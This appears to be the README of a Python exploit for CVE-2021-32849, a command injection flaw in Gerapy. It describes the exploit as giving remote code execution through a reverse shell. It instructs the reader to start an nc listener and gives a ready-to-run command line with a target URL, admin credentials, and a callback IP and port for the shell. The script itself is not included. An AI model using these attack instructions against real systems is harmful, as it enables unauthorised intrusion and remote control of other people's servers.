
Python exploit for CVE-2021-32849, a command injection in Gerapy, enabling remote code execution with reverse shell.
cve-2021-32849 (Gerapy command execution)
First start an nc listener, then use the exp to attack
python3 CVE-2021-32849.py -u http://192.168.1.69:8000 -U admin -P admin@123 -r 10.10.16.34 -p 8888 -c id
